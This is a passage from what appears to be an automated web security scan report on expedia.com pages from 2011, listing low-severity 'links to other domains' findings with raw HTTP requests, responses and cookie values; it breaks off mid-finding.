http://www.expediaaffiliate.com/private-label-xml.html
http://www.expediainc.com/
http://www.facebook.com/expedia
http://www.facebook.com/plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header
http://www.gifts.com/
http://www.hotels.com/
http://www.hotwire.com/
http://www.hsn.com/
http://www.lendingtree.com/
http://www.match.com/
http://www.pronto.com/
http://www.servicemagic.com/
http://www.shoebuy.com/
http://www.thedailybeast.com/
http://www.ticketweb.com/
http://www.travel-ticker.com/
http://www.tripadvisor.com/
http://www.venere.com/
https://joinexpedia.com/us/us.asp
https://secure.opinionlab.com/ccc01/comment_card.asp

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 11 Dec 2010 18:03:04 GMT
Pragma: no-cache
RTSS: 1
Date: Mon, 13 Jun 2011 11:27:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=1; path=/; domain=.expedia.com
Set-Cookie: SSRT1=E_T1TQE; path=/; domain=.expedia.com; expires=Tue, 12-Jun-2012 11:27:15 GMT
Set-Cookie: JSESSION=ed77ff0b-ce9e-439e-a470-a8216bfecaab; Domain=.expedia.com; Path=/
Set-Cookie: s1=`0; Domain=.expedia.com; Path=/
Set-Cookie: p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; Domain=.expedia.com; Expires=Sun, 12-Jun-2016 16:31:10 GMT; Path=/
Content-Length: 536572

<!DOCTYPE html>
<html xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
   <head>
       <meta name="language" content="en_US"/>
<meta name="robots" con
...[SNIP]...
<noscript>
<iframe class="xp-b-noXpend" src="http://fls.doubleclick.net/activityi;src=2588783;type=nausc547;cat=nausi164;u16=USD;u13=892034;u14=215.2;u11=40;u9=Millenium Hilton;u7=2|0;u6=1;u4=20110714|20110718;u1=Hotel;u2=178293;ord=1?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...
<noscript>
<iframe class="xp-b-noXpend" src="http://fls.doubleclick.net/activityi;src=2588797;type=nausc826;cat=nausi956;u1=Hotel;u4=20110714|20110718;u2=178293;u6=1;u7=2|0;u9=Millenium Hilton;u11=40;u13=892034;u14=215.2;u16=USD;ord=1?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...
</script>

<a id="nav-tool-feedback" rel="nofollow" target="_top" href="https://secure.opinionlab.com/ccc01/comment_card.asp" onclick="xp.nav.trackAnalytics(this,'a','Head:Nav:None:Opinion');OpinionLab.O_LC();return false;" >
Feedback
</a>
...[SNIP]...
<div style="float:left;padding:8px 5px 0px 0px;color:#003e7e;font-size:12px;font-weight:bold;"><a href="http://www.facebook.com/expedia" style="text-decoration:none;color:#003e7e;" target="_blank">Like us on Facebook</a></div>
   <iframe src="http://www.facebook.com/plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:90px; height:21px; margin-top:4px;" allowTransparency="true"></iframe>
...[SNIP]...
</span>
   <img id="staticMap_image" src="http://maps.google.com/staticmap?client=gme-expedia&size=222x136&zoom=14&sensor=false&format=png8&markers=40.71167,-74.01048,red|" width="192" height="136" onload="YAHOO.cx.exp.widget.infosite.StaticMap.showMap()" alt="MAP" />
</div>
...[SNIP]...
<div id="infosite_opinionLab-container">
   <a id="nav-tool-feedback" class="xp-t-bold" onclick="xp.nav.trackAnalytics(this,'a','Head:Nav:None:Opinion');OpinionLab.O_LC();return false;" href="https://secure.opinionlab.com/ccc01/comment_card.asp" target="_top" rel="nofollow">
       Give your feedback to help us make improvements
   </a>
...[SNIP]...
<li><a href="https://joinexpedia.com/us/us.asp" rel="nofollow" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:PartnerService')">Add a Hotel</a>
...[SNIP]...
<li><a href="http://www.expediaaccess.com/US/Special_Prog.aspx" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:PartnerService')">Travel Agents Affiliate Program</a>
...[SNIP]...
<li><a href="http://www.expediaaffiliate.com/private-label-xml.html" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:PartnerService')">Expedia Private Label</a>
...[SNIP]...
<li><a href="http://www.hotels.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Hotels.com</a>
...[SNIP]...
<li><a href="http://www.tripadvisor.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">TripAdvisor</a>
...[SNIP]...
<li><a href="http://www.venere.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Venere</a>
...[SNIP]...
<li><a href="http://www.hotwire.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Hotwire</a>
...[SNIP]...
<li><a href="http://www.classicvacations.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">ClassicVacations.com</a>
...[SNIP]...
<li><a href="http://www.bloglines.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Bloglines</a>
...[SNIP]...
<li><a href="http://www.carrentals.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">CarRentals.com</a>
...[SNIP]...
<li><a href="http://www.citysearch.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">CitySearch</a>
...[SNIP]...
<li><a href="http://www.evite.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Evite</a>
...[SNIP]...
<li><a href="http://www.gifts.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Gifts</a>
...[SNIP]...
<li><a href="http://www.lendingtree.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Lending Tree</a>
...[SNIP]...
<li><a href="http://www.match.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Match</a>
...[SNIP]...
<li><a href="http://www.hsn.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Online Shopping</a>
...[SNIP]...
<li><a href="http://www.pronto.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Pronto</a>
...[SNIP]...
<li><a href="http://www.servicemagic.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">ServiceMagic</a>
...[SNIP]...
<li><a href="http://www.shoebuy.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Shoes</a>
...[SNIP]...
<li><a href="http://www.thedailybeast.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">The Daily Beast</a>
...[SNIP]...
<li><a href="http://www.ticketweb.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">TicketWeb</a>
...[SNIP]...
<li><a href="http://www.travel-ticker.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Travel Ticker</a>
...[SNIP]...
<li><a href="http://investors.expediainc.com/phoenix.zhtml?c=190013&p=irol-irhome" rel="nofollow" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:CorporateLink')">Investor Relations</a>
...[SNIP]...
<li><a href="http://www.expedia.at" title="Expedia.at" class="flag-at" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a></li>
                    <li><a href="http://www.expedia.be" title="Expedia.be" class="flag-be" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a></li>
                    <li><a href="http://www.expedia.ca" title="Expedia.ca" class="flag-ca" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a></li>
                    <li><a href="http://www.expedia.dk" title="Expedia.dk" class="flag-dk" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a></li>
                    <li><a href="http://www.expedia.fr" title="Expedia.fr" class="flag-fr" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a></li>
                    <li><a href="http://www.expedia.de" title="Expedia.de" class="flag-de" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.ie" title="Expedia.ie" class="flag-ie" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a></li>
                    <li><a href="http://www.expedia.it" title="Expedia.it" class="flag-it" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.nl" title="Expedia.nl" class="flag-nl" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.no" title="Expedia.no" class="flag-no" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.es" title="Expedia.es" class="flag-es" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a></li>
                    <li><a href="http://www.expedia.se" title="Expedia.se" class="flag-se" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<div id="footer-copyright" class="footer-list-container">
©2011 <a href="http://www.expediainc.com/" rel="nofollow" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Copyright')">Expedia, Inc.</a>
...[SNIP]...

18.211. http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.expedia.com
Path:	/daily/promos/deals/summervacationsale/default.asp

Issue detail

The page was loaded from a URL containing a query string:

http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp?mcicid=summersale2011?brandcid=brandCampaign

The response contains the following links to other domains:

http://connect.facebook.net/en_US/all.js
http://investors.expediainc.com/phoenix.zhtml?c=190013&p=irol-irhome
http://www.bloglines.com/
http://www.carrentals.com/
http://www.citysearch.com/
http://www.classicvacations.com/
http://www.evite.com/
http://www.expedia.at/
http://www.expedia.be/
http://www.expedia.ca/
http://www.expedia.de/
http://www.expedia.dk/
http://www.expedia.es/
http://www.expedia.fr/
http://www.expedia.ie/
http://www.expedia.it/
http://www.expedia.nl/
http://www.expedia.no/
http://www.expedia.se/
http://www.expediaaccess.com/US/Special_Prog.aspx
http://www.expediaaffiliate.com/private-label-xml.html
http://www.expediainc.com/
http://www.facebook.com/expedia
http://www.facebook.com/plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header
http://www.gifts.com/
http://www.hotels.com/
http://www.hotwire.com/
http://www.hsn.com/
http://www.lendingtree.com/
http://www.match.com/
http://www.pronto.com/
http://www.servicemagic.com/
http://www.shoebuy.com/
http://www.thedailybeast.com/
http://www.ticketweb.com/
http://www.travel-ticker.com/
http://www.tripadvisor.com/
http://www.venere.com/
https://joinexpedia.com/us/us.asp
https://secure.opinionlab.com/ccc01/comment_card.asp

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Cteonnt-Length: 71777
Content-Type: text/html; Charset=iso-8859-1
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 11 Dec 2010 18:02:13 GMT
Pragma: no-cache
Vary: Accept-Encoding
RTSS: 1
Content-Length: 71998
Date: Mon, 13 Jun 2011 11:26:51 GMT
Connection: close
Set-Cookie: SSRT1=-_P1TQE; path=/; domain=.expedia.com; expires=Tue, 12-Jun-2012 11:26:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Temp
...[SNIP]...
</script>

<a id="nav-tool-feedback" rel="nofollow" target="_top" href="https://secure.opinionlab.com/ccc01/comment_card.asp" onclick="xp.nav.trackAnalytics(this,'a','Head:Nav:None:Opinion');OpinionLab.O_LC();return false;" >
Feedback
</a>
...[SNIP]...
<div style="float:left;padding:8px 5px 0px 0px;color:#003e7e;font-size:12px;font-weight:bold;"><a href="http://www.facebook.com/expedia" style="text-decoration:none;color:#003e7e;" target="_blank">Like us on Facebook</a></div>
   <iframe src="http://www.facebook.com/plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:90px; height:21px; margin-top:4px;" allowTransparency="true"></iframe>
...[SNIP]...
<div class="fb_like">
<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
<li><a href="https://joinexpedia.com/us/us.asp" rel="nofollow" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:PartnerService')">Add a Hotel</a>
...[SNIP]...
<li><a href="http://www.expediaaccess.com/US/Special_Prog.aspx" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:PartnerService')">Travel Agents Affiliate Program</a>
...[SNIP]...
<li><a href="http://www.expediaaffiliate.com/private-label-xml.html" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:PartnerService')">Expedia Private Label</a>
...[SNIP]...
<li><a href="http://www.hotels.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Hotels.com</a>
...[SNIP]...
<li><a href="http://www.tripadvisor.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">TripAdvisor</a>
...[SNIP]...
<li><a href="http://www.venere.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Venere</a>
...[SNIP]...
<li><a href="http://www.hotwire.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Hotwire</a>
...[SNIP]...
<li><a href="http://www.classicvacations.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">ClassicVacations.com</a>
...[SNIP]...
<li><a href="http://www.bloglines.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Bloglines</a>
...[SNIP]...
<li><a href="http://www.carrentals.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">CarRentals.com</a>
...[SNIP]...
<li><a href="http://www.citysearch.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">CitySearch</a>
...[SNIP]...
<li><a href="http://www.evite.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Evite</a>
...[SNIP]...
<li><a href="http://www.gifts.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Gifts</a>
...[SNIP]...
<li><a href="http://www.lendingtree.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Lending Tree</a>
...[SNIP]...
<li><a href="http://www.match.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Match</a>
...[SNIP]...
<li><a href="http://www.hsn.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Online Shopping</a>
...[SNIP]...
<li><a href="http://www.pronto.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Pronto</a>
...[SNIP]...
<li><a href="http://www.servicemagic.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">ServiceMagic</a>
...[SNIP]...
<li><a href="http://www.shoebuy.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Shoes</a>
...[SNIP]...
<li><a href="http://www.thedailybeast.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">The Daily Beast</a>
...[SNIP]...
<li><a href="http://www.ticketweb.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">TicketWeb</a>
...[SNIP]...
<li><a href="http://www.travel-ticker.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Travel Ticker</a>
...[SNIP]...
<li><a href="http://investors.expediainc.com/phoenix.zhtml?c=190013&p=irol-irhome" rel="nofollow" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:CorporateLink')">Investor Relations</a>
...[SNIP]...
<li><a href="http://www.expedia.at" title="Expedia.at" class="flag-at" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a></li>
                    <li><a href="http://www.expedia.be" title="Expedia.be" class="flag-be" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a></li>
                    <li><a href="http://www.expedia.ca" title="Expedia.ca" class="flag-ca" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a></li>
                    <li><a href="http://www.expedia.dk" title="Expedia.dk" class="flag-dk" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a></li>
                    <li><a href="http://www.expedia.fr" title="Expedia.fr" class="flag-fr" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a></li>
                    <li><a href="http://www.expedia.de" title="Expedia.de" class="flag-de" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.ie" title="Expedia.ie" class="flag-ie" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a></li>
                    <li><a href="http://www.expedia.it" title="Expedia.it" class="flag-it" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.nl" title="Expedia.nl" class="flag-nl" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.no" title="Expedia.no" class="flag-no" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.es" title="Expedia.es" class="flag-es" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a></li>
                    <li><a href="http://www.expedia.se" title="Expedia.se" class="flag-se" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<div id="footer-copyright" class="footer-list-container">
©2011 <a href="http://www.expediainc.com/" rel="nofollow" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Copyright')">Expedia, Inc.</a>
...[SNIP]...

18.212. http://www.expedia.com/daily/promos/deals/summervacationsale/destination_deals.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.expedia.com
Path:	/daily/promos/deals/summervacationsale/destination_deals.asp

Issue detail

The page was loaded from a URL containing a query string:

http://www.expedia.com/daily/promos/deals/summervacationsale/destination_deals.asp?tab=0&dest=New%20York%20City%20(Manhattan),%20NY&mcicid=ssdestdeal2

The response contains the following links to other domains:

http://investors.expediainc.com/phoenix.zhtml?c=190013&p=irol-irhome
http://www.bloglines.com/
http://www.carrentals.com/
http://www.citysearch.com/
http://www.classicvacations.com/
http://www.evite.com/
http://www.expedia.at/
http://www.expedia.be/
http://www.expedia.ca/
http://www.expedia.de/
http://www.expedia.dk/
http://www.expedia.es/
http://www.expedia.fr/
http://www.expedia.ie/
http://www.expedia.it/
http://www.expedia.nl/
http://www.expedia.no/
http://www.expedia.se/
http://www.expediaaccess.com/US/Special_Prog.aspx
http://www.expediaaffiliate.com/private-label-xml.html
http://www.expediainc.com/
http://www.facebook.com/expedia
http://www.facebook.com/plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header
http://www.gifts.com/
http://www.hotels.com/
http://www.hotwire.com/
http://www.hsn.com/
http://www.lendingtree.com/
http://www.match.com/
http://www.pronto.com/
http://www.servicemagic.com/
http://www.shoebuy.com/
http://www.thedailybeast.com/
http://www.ticketweb.com/
http://www.travel-ticker.com/
http://www.tripadvisor.com/
http://www.venere.com/
https://joinexpedia.com/us/us.asp
https://secure.opinionlab.com/ccc01/comment_card.asp

Request

GET /daily/promos/deals/summervacationsale/destination_deals.asp?tab=0&dest=New%20York%20City%20(Manhattan),%20NY&mcicid=ssdestdeal2 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp?mcicid=summersale2011?brandcid=brandCampaign
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; SSLB=1; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; SSRT1=f_L1TQE; ipsnf3=v.3|US|1|511|washington; COOKIECHECK=1; aspp=v.1,0|summersale2011%3Fbrandcid%3DbrandCampaign|||||||||MCI|20110713|; aspp=v.1,0|summersale2011%3Fbrandcid%3DbrandCampaign|||||||||MCI|20110713|; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; bn_u=5368708931696218534

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Cteonnt-Length: 67956
Content-Type: text/html; Charset=iso-8859-1
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 11 Dec 2010 18:02:39 GMT
Pragma: no-cache
Vary: Accept-Encoding
RTSS: 1
Content-Length: 68177
Date: Mon, 13 Jun 2011 11:21:01 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Te
...[SNIP]...
</script>

<a id="nav-tool-feedback" rel="nofollow" target="_top" href="https://secure.opinionlab.com/ccc01/comment_card.asp" onclick="xp.nav.trackAnalytics(this,'a','Head:Nav:None:Opinion');OpinionLab.O_LC();return false;" >
Feedback
</a>
...[SNIP]...
<div style="float:left;padding:8px 5px 0px 0px;color:#003e7e;font-size:12px;font-weight:bold;"><a href="http://www.facebook.com/expedia" style="text-decoration:none;color:#003e7e;" target="_blank">Like us on Facebook</a></div>
   <iframe src="http://www.facebook.com/plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:90px; height:21px; margin-top:4px;" allowTransparency="true"></iframe>
...[SNIP]...
<li><a href="https://joinexpedia.com/us/us.asp" rel="nofollow" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:PartnerService')">Add a Hotel</a>
...[SNIP]...
<li><a href="http://www.expediaaccess.com/US/Special_Prog.aspx" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:PartnerService')">Travel Agents Affiliate Program</a>
...[SNIP]...
<li><a href="http://www.expediaaffiliate.com/private-label-xml.html" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:PartnerService')">Expedia Private Label</a>
...[SNIP]...
<li><a href="http://www.hotels.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Hotels.com</a>
...[SNIP]...
<li><a href="http://www.tripadvisor.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">TripAdvisor</a>
...[SNIP]...
<li><a href="http://www.venere.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Venere</a>
...[SNIP]...
<li><a href="http://www.hotwire.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Hotwire</a>
...[SNIP]...
<li><a href="http://www.classicvacations.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">ClassicVacations.com</a>
...[SNIP]...
<li><a href="http://www.bloglines.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Bloglines</a>
...[SNIP]...
<li><a href="http://www.carrentals.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">CarRentals.com</a>
...[SNIP]...
<li><a href="http://www.citysearch.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">CitySearch</a>
...[SNIP]...
<li><a href="http://www.evite.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Evite</a>
...[SNIP]...
<li><a href="http://www.gifts.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Gifts</a>
...[SNIP]...
<li><a href="http://www.lendingtree.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Lending Tree</a>
...[SNIP]...
<li><a href="http://www.match.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Match</a>
...[SNIP]...
<li><a href="http://www.hsn.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Online Shopping</a>
...[SNIP]...
<li><a href="http://www.pronto.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Pronto</a>
...[SNIP]...
<li><a href="http://www.servicemagic.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">ServiceMagic</a>
...[SNIP]...
<li><a href="http://www.shoebuy.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Shoes</a>
...[SNIP]...
<li><a href="http://www.thedailybeast.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">The Daily Beast</a>
...[SNIP]...
<li><a href="http://www.ticketweb.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">TicketWeb</a>
...[SNIP]...
<li><a href="http://www.travel-ticker.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Travel Ticker</a>
...[SNIP]...
<li><a href="http://investors.expediainc.com/phoenix.zhtml?c=190013&p=irol-irhome" rel="nofollow" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:CorporateLink')">Investor Relations</a>
...[SNIP]...
<li><a href="http://www.expedia.at" title="Expedia.at" class="flag-at" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a></li>
                    <li><a href="http://www.expedia.be" title="Expedia.be" class="flag-be" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a></li>
                    <li><a href="http://www.expedia.ca" title="Expedia.ca" class="flag-ca" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a></li>
                    <li><a href="http://www.expedia.dk" title="Expedia.dk" class="flag-dk" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a></li>
                    <li><a href="http://www.expedia.fr" title="Expedia.fr" class="flag-fr" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a></li>
                    <li><a href="http://www.expedia.de" title="Expedia.de" class="flag-de" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.ie" title="Expedia.ie" class="flag-ie" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a></li>
                    <li><a href="http://www.expedia.it" title="Expedia.it" class="flag-it" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.nl" title="Expedia.nl" class="flag-nl" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.no" title="Expedia.no" class="flag-no" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.es" title="Expedia.es" class="flag-es" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a></li>
                    <li><a href="http://www.expedia.se" title="Expedia.se" class="flag-se" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<div id="footer-copyright" class="footer-list-container">
©2011 <a href="http://www.expediainc.com/" rel="nofollow" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Copyright')">Expedia, Inc.</a>
...[SNIP]...

18.213. http://www.expedia.com/static/default/default/scripts/exp/core/ChannelTracking.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.expedia.com
Path:	/static/default/default/scripts/exp/core/ChannelTracking.js

Issue detail

The page was loaded from a URL containing a query string:

http://www.expedia.com/static/default/default/scripts/exp/core/ChannelTracking.js?v=1.1&v=release-2011-06-r1.2.191725

The response contains the following link to another domain:

http://serviceslb-198436258.us-east-1.elb.amazonaws.com/Header/v1?pt=cobrand&partnerid=40654&pos=29&type=footer

Request

GET /static/default/default/scripts/exp/core/ChannelTracking.js?v=1.1&v=release-2011-06-r1.2.191725 HTTP/1.1
